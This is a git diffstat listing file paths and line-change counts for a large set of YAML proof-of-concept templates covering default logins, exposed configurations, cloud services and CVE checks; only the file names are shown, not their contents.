| 11 +- ...-unauth.yaml => kubernetes-unauth(1).yaml} | 0 poc/auth/lansweeper-login.yaml | 37 +- poc/auth/linksys-wifi-login.yaml | 21 +- poc/auth/lucee-login-8662.yaml | 3 + poc/auth/lucee-login-8664.yaml | 4 +- poc/auth/lucee-login-8665.yaml | 24 - poc/auth/lutron-iot-default-login-8675.yaml | 27 + poc/auth/lutron-iot-default-login-8676.yaml | 6 + poc/auth/lutron-iot-default-login-8678.yaml | 31 - poc/auth/lutron-iot-default-login.yaml | 7 +- poc/auth/mailchimp-api-key-8722.yaml | 20 +- poc/auth/mailchimp-api-key-8726.yaml | 20 - .../mantisbt-default-credential-8778.yaml | 59 +- poc/auth/meshcentral-login-8801.yaml | 21 - poc/auth/meshcentral-login-8803.yaml | 21 + poc/auth/mongodb-unauth-8925.yaml | 22 - poc/auth/mongodb-unauth-8928.yaml | 15 +- poc/auth/mysql-native-password-8981.yaml | 5 +- poc/auth/mysql-native-password.yaml | 21 +- poc/auth/nagios-default-login-8990.yaml | 44 + poc/auth/nagios-default-login-8994.yaml | 31 - poc/auth/netgear-router-auth-bypass-9025.yaml | 28 - poc/auth/netgear-router-auth-bypass.yaml | 28 + poc/auth/netscaler-aaa-login.yaml | 21 +- poc/auth/netsus-default-login-9060.yaml | 46 - poc/auth/netsus-default-login.yaml | 33 + poc/auth/netsus-server-login-9061.yaml | 20 + poc/auth/netsus-server-login-9062.yaml | 20 - poc/auth/nexus-default-login-9088.yaml | 11 +- poc/auth/nexus-default-login-9089.yaml | 16 +- poc/auth/nps-default-login-9145.yaml | 54 - poc/auth/nuuno-network-login-9164.yaml | 20 + ...gin-9162.yaml => nuuno-network-login.yaml} | 0 poc/auth/oauth-access-key-9186.yaml | 22 + poc/auth/oauth2-detect-9181.yaml | 32 - poc/auth/oauth2-detect-9182.yaml | 51 +- poc/auth/octobercms-default-login-9192.yaml | 65 - poc/auth/octobercms-default-login.yaml | 59 + poc/auth/ofbiz-default-credentials.yaml | 4 +- poc/auth/ofbiz-default-login-9210.yaml | 40 - poc/auth/ofbiz-default-login-9211.yaml | 9 + poc/auth/open-stack-dashboard-login-9321.yaml | 21 + poc/auth/open-stack-dashboard-login-9322.yaml | 22 - 
poc/auth/open-stack-dashboard-login-9323.yaml | 2 +- poc/auth/openemr-default-login-9270.yaml | 6 +- poc/auth/openemr-default-login.yaml | 43 - poc/auth/openwrt-default-login.yaml | 13 +- poc/auth/oracle-opera-login.yaml | 38 + poc/auth/panabit-default-login-9438.yaml | 12 +- poc/auth/panabit-default-login-9440.yaml | 26 +- .../panabit-ixcache-default-login-9443.yaml | 14 +- poc/auth/panabit-ixcache-default-login.yaml | 30 + poc/auth/panos-default-login-9454.yaml | 18 +- poc/auth/panos-default-login-9455.yaml | 34 + poc/auth/panos-default-login.yaml | 42 + poc/auth/paypal-braintree-token(1).yaml | 16 + poc/auth/paypal-braintree-token-11856.yaml | 13 - poc/auth/paypal-braintree-token.yaml | 4 - poc/auth/pentaho-default-login-9477.yaml | 14 +- poc/auth/pentaho-default-login-9478.yaml | 33 - poc/auth/pentaho-default-login-9480.yaml | 42 + poc/auth/phabricator-login.yaml | 20 +- poc/auth/pictatic-api-key-9576.yaml | 5 +- poc/auth/pictatic-api-key.yaml | 4 - poc/auth/pieregister-open-redirect-9577.yaml | 13 +- poc/auth/pieregister-open-redirect-9579.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 10 +- poc/auth/pinpoint-unauth-9588.yaml | 13 +- poc/auth/pinpoint-unauth-9590.yaml | 27 - poc/auth/plastic-scm-login.yaml | 19 +- poc/auth/polycom-login-9625.yaml | 20 - poc/auth/polycom-login-9627.yaml | 21 + poc/auth/polycom-login.yaml | 19 +- poc/auth/possible-AEM-secrets.yaml | 46 - poc/auth/private-key-9655.yaml | 3 - poc/auth/project-insight-login.yaml | 18 +- poc/auth/pure-storage-login.yaml | 18 +- ...=> putty-private-key-disclosure-9730.yaml} | 0 poc/auth/r-webserver-login.yaml | 22 +- poc/auth/rabbitmq-default-login-9783.yaml | 12 +- poc/auth/rabbitmq-default-login-9786.yaml | 12 +- .../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + poc/auth/rails-secret-token-disclosure.yaml | 3 +- poc/auth/rainloop-default-login-9811.yaml | 19 +- poc/auth/rainloop-default-login.yaml | 44 + 
poc/auth/rancher-default-login-9814.yaml | 11 +- poc/auth/rancher-default-login-9815.yaml | 12 +- poc/auth/ranger-default-login-9827.yaml | 39 + poc/auth/ranger-default-login-9828.yaml | 15 +- poc/auth/ricoh-weak-password-9880.yaml | 9 +- poc/auth/ricoh-weak-password-9882.yaml | 11 +- poc/auth/rockmongo-default-login-9897.yaml | 47 + poc/auth/rockmongo-default-login-9899.yaml | 11 +- ...gin-9908.yaml => routeros-login-9909.yaml} | 0 poc/auth/routeros-login.yaml | 25 - poc/auth/rseenet-default-login-9913.yaml | 9 + poc/auth/rseenet-default-login-9914.yaml | 6 +- poc/auth/ruijie-eg-password-leak-9922.yaml | 39 - poc/auth/ruijie-eg-password-leak.yaml | 8 +- poc/auth/saferoads-vms-login-9971.yaml | 17 - poc/auth/saferoads-vms-login-9973.yaml | 16 + poc/auth/saferoads-vms-login.yaml | 18 +- .../samsung-wlan-default-login-10018.yaml | 45 + poc/auth/sangfor-edr-auth-bypass-10022.yaml | 33 +- poc/auth/sangfor-edr-auth-bypass.yaml | 29 - ...gin-10089.yaml => sauter-login-10091.yaml} | 0 poc/auth/sauter-login.yaml | 22 +- poc/auth/seats-login-10104.yaml | 19 - poc/auth/seats-login.yaml | 3 +- poc/auth/seeddms-default-login-10125.yaml | 16 +- poc/auth/seeddms-default-login-10127.yaml | 20 +- poc/auth/sendgrid-api-key-10140.yaml | 2 +- poc/auth/sequoiadb-default-login-10150.yaml | 17 +- poc/auth/server-backup-login-10153.yaml | 19 + poc/auth/server-backup-login-10156.yaml | 20 - poc/auth/server-backup-login.yaml | 24 +- ...server-backup-manager-se-login-detect.yaml | 25 +- ...ervice-pwd.yaml => service-pwd-10176.yaml} | 0 poc/auth/service-pwd-10178.yaml | 16 +- poc/auth/servicedesk-login-panel-10172.yaml | 22 - poc/auth/servicedesk-login-panel.yaml | 15 +- poc/auth/sgp-login-panel-10182.yaml | 3 +- poc/auth/sgp-login-panel.yaml | 21 +- poc/auth/sharecenter-login-10190.yaml | 1 + poc/auth/shopify-custom-token(1).yaml | 16 + poc/auth/shopify-custom-token-10198.yaml | 13 - poc/auth/shopify-custom-token-11860.yaml | 5 +- poc/auth/shopify-private-token-11861.yaml | 16 - 
poc/auth/shopify-private-token.yaml | 5 +- poc/auth/shoppable-token-10206.yaml | 5 +- poc/auth/shoppable-token-10209.yaml | 16 + poc/auth/shoppable-token.yaml | 16 + poc/auth/showdoc-default-login-10221.yaml | 14 +- ...10298.yaml => sitefinity-login-10297.yaml} | 0 poc/auth/sitefinity-login.yaml | 12 +- poc/auth/siteomat-login-10300.yaml | 19 - poc/auth/siteomat-login-10301.yaml | 19 + poc/auth/siteomat-login-10303.yaml | 3 +- poc/auth/slack-bot-token-10310.yaml | 5 +- poc/auth/slack-bot-token-10312.yaml | 18 + poc/auth/slocum-login-10317.yaml | 4 + poc/auth/slocum-login.yaml | 17 +- poc/auth/smartsense-default-login-10330.yaml | 12 +- poc/auth/smartsense-default-login-10331.yaml | 9 +- poc/auth/solar-log-authbypass-10352.yaml | 39 - poc/auth/solar-log-authbypass.yaml | 27 + poc/auth/solarwinds-default-login-10355.yaml | 47 - poc/auth/solarwinds-default-login-10356.yaml | 16 +- poc/auth/somfy-login-10371.yaml | 18 + poc/auth/somfy-login-10373.yaml | 18 - poc/auth/sonarqube-token-10380.yaml | 15 - poc/auth/sonarqube-token-10382.yaml | 9 +- poc/auth/spark-webui-unauth-10401.yaml | 26 + poc/auth/spark-webui-unauth.yaml | 15 +- poc/auth/sphider-login-10407.yaml | 22 - poc/auth/sphider-login-10408.yaml | 4 +- poc/auth/sphider-login-10409.yaml | 21 + poc/auth/sphider-login.yaml | 23 +- poc/auth/splunk-enterprise-login-panel.yaml | 23 +- poc/auth/splunk-enterprise-login-panel.yml | 22 - poc/auth/splunk-login-10416.yaml | 24 + poc/auth/square-access-token(1).yaml | 17 - poc/auth/square-access-token-11867.yaml | 14 + poc/auth/square-access-token.yaml | 3 + poc/auth/ssh-authorized-keys-10523.yaml | 22 +- .../stem-audio-table-private-keys-10535.yaml | 22 + .../stem-audio-table-private-keys-10536.yaml | 27 - poc/auth/stem-audio-table-private-keys.yaml | 9 +- poc/auth/stripe-api-key(1).yaml | 16 + poc/auth/stripe-api-key-11869.yaml | 13 - poc/auth/stripe-restricted-key-10553.yaml | 2 +- poc/auth/stripe-restricted-key.yaml | 15 + poc/auth/submitty-login-10568.yaml | 31 - 
poc/auth/submitty-login.yaml | 15 +- poc/auth/supermicro-default-login-10572.yaml | 11 +- poc/auth/supermicro-default-login.yaml | 36 + poc/auth/superset-default-login-10574.yaml | 13 +- poc/auth/superset-default-login.yaml | 8 + poc/auth/symantec-dlp-login-10596.yaml | 21 - ...601.yaml => symantec-epm-login-10599.yaml} | 0 poc/auth/symantec-ewep-login-10605.yaml | 7 +- poc/auth/symantec-ewep-login-10606.yaml | 3 +- poc/auth/szhe-default-login-10636.yaml | 10 +- ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../telecom-gateway-default-login-10686.yaml | 14 +- poc/auth/telecom-gateway-default-login.yaml | 33 + poc/auth/tidb-unauth-10770.yaml | 23 + poc/auth/tidb-unauth-10772.yaml | 26 - poc/auth/tomcat-default-login-10791.yaml | 2 +- poc/auth/tomcat-default-login.yaml | 76 + poc/auth/tracer-sc-login.yaml | 21 +- poc/auth/twitter-secret-10862.yaml | 3 +- poc/auth/twitter-secret.yaml | 4 + poc/auth/ucmdb-default-login-10868.yaml | 3 +- poc/auth/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/auth/unauth-ftp-10939.yaml | 13 +- poc/auth/unauth-ftp-10942.yaml | 18 - poc/auth/unauth-hoteldruid-panel-10943.yaml | 39 - poc/auth/unauth-hoteldruid-panel.yaml | 25 + poc/auth/unauth-message-read-10947.yaml | 37 +- poc/auth/unauth-spark-api-10963.yaml | 14 +- poc/auth/unauth-spark-api.yaml | 30 - poc/auth/unauth-wavink-panel-10967.yaml | 48 + poc/auth/unauth-xproxy-dashboard-10968.yaml | 23 - poc/auth/unauth-xproxy-dashboard-10969.yaml | 27 + poc/auth/unauth-xproxy-dashboard.yaml | 4 - poc/auth/unauthenticated-airflow-10884.yaml | 27 + poc/auth/unauthenticated-airflow-10886.yaml | 23 - poc/auth/unauthenticated-airflow.yaml | 12 +- .../unauthenticated-alert-manager-10888.yaml | 3 +- .../unauthenticated-alert-manager-10892.yaml | 23 - poc/auth/unauthenticated-frp-10895.yaml | 21 + poc/auth/unauthenticated-frp-10896.yaml | 5 + poc/auth/unauthenticated-frp-10897.yaml | 26 - poc/auth/unauthenticated-glowroot-10900.yaml | 13 +- 
poc/auth/unauthenticated-glowroot-10902.yaml | 8 +- poc/auth/unauthenticated-influxdb-10903.yaml | 27 + poc/auth/unauthenticated-influxdb.yaml | 6 +- poc/auth/unauthenticated-jenkins.yaml | 50 +- poc/auth/unauthenticated-mongo-express.yaml | 23 + .../unauthenticated-nacos-access-10912.yaml | 40 + .../unauthenticated-nacos-access-10915.yaml | 35 - poc/auth/unauthenticated-nacos-access.yaml | 6 + poc/auth/unauthenticated-netdata.yaml | 11 +- .../unauthenticated-popup-upload-10921.yaml | 21 + ...yaml => unauthenticated-popup-upload.yaml} | 0 poc/auth/unauthenticated-prtg-10924.yaml | 20 - poc/auth/unauthenticated-prtg-10927.yaml | 21 + poc/auth/unauthenticated-zipkin.yaml | 26 - poc/auth/unauthenticated-zippkin.yaml | 5 + .../unauthorized-h3csecparh-login-10948.yaml | 34 - poc/auth/unauthorized-h3csecparh-login.yaml | 29 + poc/auth/unauthorized-hp-printer-10951.yaml | 20 + poc/auth/unauthorized-plastic-scm-10956.yaml | 17 +- poc/auth/unauthorized-plastic-scm-10957.yaml | 49 - ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/auth/versa-default-login-11003.yaml | 21 +- poc/auth/versa-default-login-11004.yaml | 29 +- poc/auth/vidyo-default-login-11009.yaml | 52 - ...in.yaml => vidyo-default-login-11010.yaml} | 0 poc/auth/vigor-login-11020.yaml | 19 + poc/auth/vigor-login-11023.yaml | 20 - poc/auth/vigor-login.yaml | 19 +- poc/auth/visionhub-default-login-11026.yaml | 42 + poc/auth/visionhub-default-login-11027.yaml | 12 +- poc/auth/vpms-auth-bypass-11066.yaml | 33 + poc/auth/vpms-auth-bypass-11068.yaml | 32 - ...tchguard-credentials-disclosure-11107.yaml | 16 +- ...=> watchguard-credentials-disclosure.yaml} | 0 poc/auth/weblogic-weak-login-11154.yaml | 68 - poc/auth/weblogic-weak-login-11155.yaml | 14 +- poc/auth/whm-login-detect.yaml | 22 +- poc/auth/wifisky-default-password-11205.yaml | 38 - poc/auth/wifisky-default-password.yaml | 16 +- 
...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +- ...ordpress-infinitewp-auth-bypass-11288.yaml | 60 - poc/auth/wordpress-login.yaml | 16 +- poc/auth/wordpress-updraftplus-pem-key.yaml | 12 +- .../wordpress-weak-credentials-11336.yaml | 43 + .../wordpress-weak-credentials-11337.yaml | 37 - poc/auth/wordpress-weak-credentials.yaml | 17 +- poc/auth/wpdm-cache-session-11436.yaml | 23 + poc/auth/wpdm-cache-session-11438.yaml | 24 - poc/auth/wso2-default-login.yaml | 38 - poc/auth/xenforo-login-11674.yaml | 17 - poc/auth/xenmobile-login-11675.yaml | 19 + poc/auth/xenmobile-login-11677.yaml | 20 - poc/auth/xenmobile-login.yaml | 19 +- poc/auth/xerox7-default-login-11679.yaml | 21 +- poc/auth/xerox7-default-login.yaml | 46 + poc/auth/xvr-login-11704.yaml | 8 +- poc/auth/xvr-login-11705.yaml | 20 + poc/auth/xxljob-default-login-11709.yaml | 53 - poc/auth/xxljob-default-login-11712.yaml | 16 +- poc/auth/zabbix-default-credentials.yaml | 7 +- poc/auth/zabbix-server-login-11767.yaml | 3 +- poc/auth/zabbix-server-login-11769.yaml | 23 + poc/auth/zeroshell-login-11788.yaml | 20 + poc/auth/zeroshell-login-11790.yaml | 20 - poc/auth/zeroshell-login.yaml | 18 +- poc/auth/zhiyuan-oa-session-leak-11802.yaml | 22 + ...1801.yaml => zhiyuan-oa-session-leak.yaml} | 0 poc/auth/zhiyuan-oa-unauthorized-11806.yaml | 25 + poc/auth/zhiyuan-oa-unauthorized-11808.yaml | 26 - poc/auth/zimbra-preauth-ssrf-11810.yaml | 14 +- poc/auth/zimbra-preauth-ssrf.yaml | 20 + poc/auth/zms-auth-bypass-11830.yaml | 33 + poc/auth/zms-auth-bypass-11832.yaml | 34 - poc/auth/zoho-webhook-token-11835.yaml | 2 +- poc/aws/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - poc/aws/amazon-docker-config-disclosure.yaml | 12 +- poc/aws/amazon-docker-config.yaml | 18 + poc/aws/amazon-mws-auth-token-11845.yaml | 11 +- poc/aws/amazon-mws-auth-token-282.yaml | 6 +- poc/aws/amazon-mws-auth-token-283.yaml | 11 +- poc/aws/aws-access-id-618.yaml | 16 - poc/aws/aws-access-id-620.yaml | 16 
- poc/aws/aws-access-id.yaml | 11 +- poc/aws/aws-access-key-value-624.yaml | 22 + poc/aws/aws-bucket-service-628.yaml | 31 - poc/aws/aws-bucket-service.yaml | 27 + poc/aws/aws-cloudfront-service-634.yaml | 14 +- poc/aws/aws-cloudfront-service-635.yaml | 22 - poc/aws/aws-cognito-638.yaml | 32 - .../aws-ecs-container-agent-tasks-641.yaml | 25 - poc/aws/aws-elastic-beanstalk-detect-644.yaml | 7 +- poc/aws/aws-elastic-beanstalk-detect.yaml | 31 - poc/aws/aws-object-listing-646.yaml | 3 +- poc/aws/aws-object-listing.yaml | 11 +- poc/aws/aws-opensearch-login-649.yaml | 24 + poc/aws/aws-opensearch-login-650.yaml | 25 - poc/aws/aws-opensearch-login.yaml | 3 +- poc/aws/aws-redirect-651.yaml | 24 + poc/aws/aws-redirect-652.yaml | 13 +- poc/aws/awstats-config-656.yaml | 36 + poc/aws/awstats-config.yaml | 26 - poc/aws/awstats-script-657.yaml | 29 + poc/aws/awstats-script-658.yaml | 29 - poc/aws/awstats-script.yaml | 20 +- poc/aws/ec2-detection-7162.yaml | 18 - poc/aws/ec2-detection-7163.yaml | 24 + poc/aws/metadata-aws-8812.yaml | 26 +- poc/aws/metadata-aws.yaml | 41 - poc/aws/s3-bucket.yaml | 4 + poc/aws/s3-detect-9964.yaml | 19 +- poc/aws/s3-subtakeover-9968.yaml | 20 - poc/aws/s3-subtakeover-9969.yaml | 24 + poc/backup/adb-backup-enabled-60.yaml | 15 +- poc/backup/db-backup-lfi-6774.yaml | 25 - poc/backup/db-backup-lfi-6775.yaml | 30 + poc/backup/db-backup-lfi-6776.yaml | 11 +- poc/backup/db-backup-lfi.yaml | 4 - ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/backup/php-backup-files.yaml | 127 +- poc/backup/server-backup-login-10153.yaml | 19 + poc/backup/server-backup-login-10156.yaml | 20 - poc/backup/server-backup-login.yaml | 24 +- .../server-backup-manager-se-10157.yaml | 19 - .../server-backup-manager-se-10160.yaml | 20 + ...server-backup-manager-se-login-detect.yaml | 25 +- ...s-total-upkeep-backup-download-11324.yaml} | 0 ...ordpress-total-upkeep-backup-download.yaml | 13 +- poc/backup/zip-backup-files-11818.yaml | 99 +- 
poc/cisco/cisco-ace-device-manager.yaml | 16 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 - poc/cisco/cisco-cloudcenter-suite-rce.yaml | 73 + poc/cisco/cisco-edge-340.yaml | 16 +- poc/cisco/cisco-finesse-login-938.yaml | 22 - poc/cisco/cisco-finesse-login-940.yaml | 23 + poc/cisco/cisco-integrated-login-941.yaml | 3 +- poc/cisco/cisco-meraki-exposure-944.yaml | 25 + poc/cisco/cisco-meraki-exposure-946.yaml | 26 - poc/cisco/cisco-network-config-949.yaml | 34 - poc/cisco/cisco-network-config.yaml | 24 + poc/cisco/cisco-prime-infrastructure-952.yaml | 26 - poc/cisco/cisco-prime-infrastructure-954.yaml | 26 + poc/cisco/cisco-sd-wan-955.yaml | 25 + poc/cisco/cisco-sd-wan-957.yaml | 26 - poc/cisco/cisco-secure-desktop-962.yaml | 27 - poc/cisco/cisco-security-details-963.yaml | 22 - poc/cisco/cisco-security-details.yaml | 2 +- poc/cisco/cisco-smi-exposure-970.yaml | 14 +- ...e-972.yaml => cisco-smi-exposure-971.yaml} | 0 poc/cisco/cisco-systems-login-973.yaml | 25 + poc/cisco/cisco-systems-login-975.yaml | 32 - poc/cisco/cisco-systems-login.yaml | 12 +- poc/cisco/cisco-telepresence-976.yaml | 25 + poc/cisco/cisco-telepresence-978.yaml | 25 - poc/cisco/cisco-telepresence.yaml | 4 +- ...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0 poc/cisco/cisco-ucs-kvm-login.yaml | 13 +- .../adobe-coldfusion-detect-82.yaml | 62 - .../adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 .../coldfusion-administrator-login-1145.yaml | 49 +- poc/coldfusion/coldfusion-debug-xss-1153.yaml | 31 + poc/coldfusion/coldfusion-debug-xss.yaml | 34 - .../unpatched-coldfusion-10979.yaml | 30 + poc/coldfusion/unpatched-coldfusion.yaml | 2 - poc/config/aerohive-netconfig-ui-199.yaml | 73 +- ...ui.yaml => aerohive-netconfig-ui-200.yaml} | 0 .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - poc/config/amazon-docker-config-280.yaml | 28 - 
.../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/config/amazon-docker-config.yaml | 18 + poc/config/ansible-config-disclosure-326.yaml | 28 + poc/config/ansible-config-disclosure.yaml | 16 - poc/config/api-iconfinder-439.yaml | 34 + poc/config/awstats-config-656.yaml | 36 + poc/config/awstats-config.yaml | 26 - .../bigip-config-utility-detect-730.yaml | 34 + .../bigip-config-utility-detect-731.yaml | 2 +- .../bigip-config-utility-detect-732.yaml | 42 + poc/config/buffalo-config-injection-798.yaml | 30 - poc/config/buffalo-config-injection-800.yaml | 34 + poc/config/buffalo-config-injection-801.yaml | 39 + poc/config/buffalo-config-injection.yaml | 6 +- poc/config/circleci-config-923.yaml | 35 + poc/config/circleci-config-925.yaml | 3 +- poc/config/cisco-network-config-949.yaml | 34 - poc/config/cisco-network-config.yaml | 24 + poc/config/config-rb-1179.yaml | 30 + .../{config-rb-1180.yaml => config-rb.yaml} | 0 poc/config/configuration-listing-1182.yaml | 61 +- poc/config/confluence-detect-1186.yaml | 14 +- poc/config/confluence-detect-1187.yaml | 40 - poc/config/confluence-detect-1189.yaml | 41 + .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - poc/config/cors-misconfig-1223.yaml | 44 + poc/config/detect-drone-config-6972.yaml | 7 +- poc/config/detect-drone-config-6973.yaml | 2 +- poc/config/docker-compose-config-7059.yaml | 27 - poc/config/docker-compose-config.yaml | 26 + poc/config/dockercfg-config-7056.yaml | 6 - poc/config/dockercfg-config.yaml | 26 - poc/config/esmtprc-config-7258.yaml | 10 +- poc/config/esmtprc-config-7259.yaml | 11 +- poc/config/firebase-config-exposure.yaml | 30 - poc/config/front-page-misconfig-7547.yaml | 25 + .../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0 poc/config/ftpconfig-7566.yaml | 13 +- poc/config/git-config-7635.yaml | 14 + poc/config/git-config-7636.yaml | 19 +- ...l => 
git-config-nginxoffbyslash-7628.yaml} | 0 .../git-config-nginxoffbyslash-7630.yaml | 35 + poc/config/github-page-config-7654.yaml | 30 + .../gocd-cruise-configuration-7748.yaml | 27 - .../grandstream-device-configuration.yaml | 9 +- ....yaml => honeywell-scada-config-7990.yaml} | 0 poc/config/honeywell-scada-config-7992.yaml | 25 - poc/config/htaccess-config-8043.yaml | 26 + poc/config/httpd-config-8055.yaml | 34 + poc/config/httpd-config.yaml | 24 - poc/config/joomla-config-file-8376.yaml | 10 +- poc/config/joomla-config-file-8377.yaml | 12 +- poc/config/keycloak-openid-config-8475.yaml | 39 - poc/config/keycloak-openid-config.yaml | 25 + poc/config/magento-config-disclosure.yaml | 50 - ...02.yaml => misconfigured-docker-8900.yaml} | 0 poc/config/misconfigured-docker.yaml | 10 +- poc/config/msmtp-config-8967.yaml | 42 + poc/config/nginx-config-9098.yaml | 26 +- ...inx-config.yaml => nginx-config-9099.yaml} | 0 poc/config/parameters-config-9465.yaml | 38 - poc/config/parameters-config.yaml | 32 + poc/config/prometheus-config-9673.yaml | 37 + poc/config/prometheus-config-endpoint.yaml | 19 +- poc/config/prometheus-config.yaml | 27 - poc/config/rconfig-rce-9834.yaml | 20 +- poc/config/samba-config-9987.yaml | 34 - poc/config/samba-config.yaml | 20 + poc/config/springboot-autoconfig.yaml | 25 - poc/config/springboot-configprops-10442.yaml | 42 + poc/config/symfony-database-config-10615.yaml | 13 +- poc/config/symfony-database-config-10616.yaml | 17 - ...aml => symfony-database-config-10617.yaml} | 0 poc/config/tcpconfig.yaml | 19 + poc/config/tugboat-config-exposure-10842.yaml | 32 - ...aml => tugboat-config-exposure-10843.yaml} | 0 .../wamp-server-configuration-11096.yaml | 20 - poc/config/web-config-11125.yaml | 24 - .../wordpress-accessible-wpconfig-11235.yaml | 38 - .../wordpress-accessible-wpconfig-11238.yaml | 12 +- poc/config/wordpress-git-config-11278.yaml | 26 - poc/config/wordpress-git-config-11279.yaml | 16 +- poc/config/wp-config-setup.yaml | 15 +- 
poc/config/wpengine-config-check.yaml | 22 - poc/config/zend-config-file-11778.yaml | 37 + poc/config/zend-config-file-11779.yaml | 22 - poc/crlf_injection/crlf-injection-1262.yaml | 29 + poc/crlf_injection/crlf-injection-1263.yaml | 6 +- poc/crlf_injection/crlf-injection-1264.yaml | 51 +- .../csrfguard-detect-1291.yaml | 17 +- ...detect-1290.yaml => csrfguard-detect.yaml} | 0 poc/cve/CNVD-2020-23735.yaml | 23 +- poc/cve/CNVD-2020-56167.yaml | 20 +- poc/cve/CNVD-2021-14536.yaml | 13 +- poc/cve/CNVD-2021-17369.yaml | 11 +- poc/cve/CNVD-2021-26422.yaml | 29 + poc/cve/CNVD-2021-30167.yaml | 22 +- poc/cve/CVE-2000-0114.yaml | 28 +- poc/cve/CVE-2002-1131.yaml | 35 +- poc/cve/CVE-2007-4504.yaml | 5 - poc/cve/CVE-2008-6222.yaml | 29 +- poc/cve/CVE-2008-6668.yaml | 37 +- poc/cve/CVE-2009-1151.yaml | 32 +- poc/cve/CVE-2009-1496.yaml | 29 +- poc/cve/CVE-2009-2015.yaml | 28 +- poc/cve/CVE-2009-2100.yaml | 12 +- poc/cve/CVE-2009-3053.yaml | 28 +- poc/cve/CVE-2010-0943.yaml | 28 +- poc/cve/CVE-2010-0972.yaml | 24 +- poc/cve/CVE-2010-0982.yaml | 26 +- poc/cve/CVE-2010-1056.yaml | 28 +- poc/cve/CVE-2010-1302.yaml | 2 - poc/cve/CVE-2010-1305.yaml | 8 +- poc/cve/CVE-2010-1307.yaml | 8 +- poc/cve/CVE-2010-1308.yaml | 24 +- poc/cve/CVE-2010-1312.yaml | 27 +- poc/cve/CVE-2010-1313.yaml | 27 +- poc/cve/CVE-2010-1314.yaml | 25 +- poc/cve/CVE-2010-1315.yaml | 26 +- poc/cve/CVE-2010-1345.yaml | 28 +- poc/cve/CVE-2010-1352.yaml | 25 +- poc/cve/CVE-2010-1353.yaml | 4 +- poc/cve/CVE-2010-1469.yaml | 24 +- poc/cve/CVE-2010-1470.yaml | 24 +- poc/cve/CVE-2010-1474.yaml | 28 +- poc/cve/CVE-2010-1491.yaml | 26 +- poc/cve/CVE-2010-1494.yaml | 26 +- poc/cve/CVE-2010-1532.yaml | 25 +- poc/cve/CVE-2010-1540.yaml | 6 +- poc/cve/CVE-2010-1657.yaml | 15 +- poc/cve/CVE-2010-1658.yaml | 27 +- poc/cve/CVE-2010-1659.yaml | 4 +- poc/cve/CVE-2010-1714.yaml | 28 +- poc/cve/CVE-2010-1715.yaml | 27 +- poc/cve/CVE-2010-1717.yaml | 25 +- poc/cve/CVE-2010-1718.yaml | 27 +- poc/cve/CVE-2010-1858.yaml | 26 +- 
poc/cve/CVE-2010-1953.yaml | 27 +- poc/cve/CVE-2010-1981.yaml | 26 +- poc/cve/CVE-2010-1982.yaml | 26 +- poc/cve/CVE-2010-2682.yaml | 25 +- poc/cve/CVE-2010-2920.yaml | 25 +- poc/cve/CVE-2010-3203.yaml | 24 +- poc/cve/CVE-2010-4239.yaml | 33 +- poc/cve/CVE-2010-4617.yaml | 25 +- poc/cve/CVE-2010-5028.yaml | 27 +- poc/cve/CVE-2010-5278.yaml | 36 +- poc/cve/CVE-2011-2744.yaml | 27 +- poc/cve/CVE-2011-3315.yaml | 28 +- poc/cve/CVE-2012-0896.yaml | 4 +- poc/cve/CVE-2012-0981.yaml | 26 +- poc/cve/CVE-2012-4273.yaml | 30 +- poc/cve/CVE-2012-4768.yaml | 30 +- poc/cve/CVE-2013-5528.yaml | 23 +- poc/cve/CVE-2013-5979.yaml | 5 - poc/cve/CVE-2013-6281.yaml | 33 +- poc/cve/CVE-2013-7240.yaml | 26 +- poc/cve/CVE-2014-1203.yaml | 22 +- poc/cve/CVE-2014-2962.yaml | 30 +- poc/cve/CVE-2014-4561.yaml | 26 +- poc/cve/CVE-2014-4940.yaml | 25 +- poc/cve/CVE-2014-4942.yaml | 32 +- poc/cve/CVE-2014-9606.yaml | 21 +- poc/cve/CVE-2014-9609.yaml | 19 +- poc/cve/CVE-2015-0554.yaml | 4 - poc/cve/CVE-2015-1880.yaml | 43 +- poc/cve/CVE-2015-2166.yaml | 23 +- poc/cve/CVE-2015-3306.yaml | 42 +- poc/cve/CVE-2015-4050.yaml | 30 +- poc/cve/CVE-2015-5471.yaml | 23 +- poc/cve/CVE-2015-6544.yaml | 36 +- poc/cve/CVE-2015-7780.yaml | 33 +- poc/cve/CVE-2016-1000126.yaml | 29 +- poc/cve/CVE-2016-1000128.yaml | 26 +- poc/cve/CVE-2016-1000132.yaml | 21 +- poc/cve/CVE-2016-1000134.yaml | 21 +- poc/cve/CVE-2016-1000143.yaml | 26 +- poc/cve/CVE-2016-1000146.yaml | 28 +- poc/cve/CVE-2016-1000154.yaml | 27 +- poc/cve/CVE-2016-1000155.yaml | 28 +- poc/cve/CVE-2016-10367.yaml | 25 +- poc/cve/CVE-2016-10940.yaml | 23 +- poc/cve/CVE-2016-7552.yaml | 28 +- poc/cve/CVE-2017-11586.yaml | 49 +- poc/cve/CVE-2017-12542.yaml | 30 +- poc/cve/CVE-2017-12794.yaml | 37 +- poc/cve/CVE-2017-14524.yaml | 39 +- poc/cve/CVE-2017-14535.yaml | 26 +- poc/cve/CVE-2017-15647.yaml | 24 +- poc/cve/CVE-2017-15944.yaml | 21 +- poc/cve/CVE-2017-17451.yaml | 28 +- poc/cve/CVE-2017-18536.yaml | 27 +- poc/cve/CVE-2017-3528.yaml | 26 